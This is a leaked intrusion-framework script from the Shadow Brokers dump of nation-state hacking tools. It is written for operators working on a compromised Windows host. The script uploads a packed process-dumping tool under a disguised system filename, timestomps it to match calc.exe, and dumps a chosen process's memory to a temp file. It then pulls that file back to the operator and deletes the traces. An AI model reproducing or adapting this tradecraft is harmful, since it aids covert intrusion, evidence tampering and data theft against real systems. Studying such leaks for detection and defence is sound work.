shadowbrokers-exploits/windows/Resources/Ep/Scripts/bindump.eps
2017-04-14 11:45:07 +02:00

89 lines
No EOL
2.4 KiB
PostScript

#-------------------------------------------------------------------------------
# File: bindump.eps
# Description: Tries to run bindump on the target.
#
# 26 July 2007 Created....
#
#-------------------------------------------------------------------------------
int $offendingPID = GetInput("What is the PID for the offending process? (\"-1\" to exit)");
if ($offendingPID == -1) {
return false;
}
string $ScriptsDir = GetEnv("SCRIPTSDIR");
string $resources = GetEnv("RESOURCESDIR");
@echo on;
string $remoteToolName = GetEnv("remoteToolName");
string $sSysPath = GetEnv("SYSPATH");
if ($remoteToolName == "") {
$remoteToolName="$sSysPath\\cmdl16.exe";
}
ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") {
$remoteToolName=GetInput("What do you want to upload the tool as?");
}
SetEnv("remoteToolName", "$remoteToolName");
string $split = SplitPath("$remoteToolName");
while (`put $ScriptsDir\\..\\..\\..\\B-Tools\\bindump_packed.exe -name $remoteToolName` == false) {
if (prompt "File exists, delete \"$remoteToolName\"?") {
`del $split[1] -path "$split[0]"`;
sleep(200);
} else {
return false;
}
}
@echo off;
`matchtimes $sSysPath\\calc.exe $remoteToolName`;
@record on;
`run -command "$remoteToolName $offendingPID" -redirect`;
@record off;
@echo on;
#grep out the sizes:
string $output = GetCmdData("output");
WriteFile("$resources\\bindmp.out",false,$output);
@record on;
`local grep -mask $resources\\bindmp.out -pattern "Module: 0"`;
@record off;
`local run -command "cmd.exe /C del $resources\\bindmp.out"`;
string $match = GetCmdData("line_data");
if (sizeof($match) == 0) {
echo "Something when wrong, are you sure that PID exists?";
prompt `del $split[1] -path "$split[0]"`;
return false;
}
echo "The size of the bin-dump output is listed (IN HEX) as the last line above.";
echo "IF THIS AMOUNT IS REALLY BIG, OR IF THERE IS NOT 2X THIS AMOUNT OF ROOM ON THE DISK, SAY NO HERE.";
if (prompt "\nDo you want to bindump this exe?") {
@echo off;
prompt `run -command "$remoteToolName $offendingPID ~Wa8z1.tmp 0" -redirect bindump`;
@echo on;
}
`dir ~Wa8z1.tmp`;
if (prompt "Download \"~Wa8z1.tmp\" (the output file, size listed above)?") {
`get ~Wa8z1.tmp`;
}
if (prompt "Delete both files? (wait until get is done)") {
`del ~Wa8z1.tmp`;
`del $split[1] -path "$split[0]"`;
`dir ~Wa8z1.tmp`;
`dir $split[1] -path "$split[0]"`;
}
return true;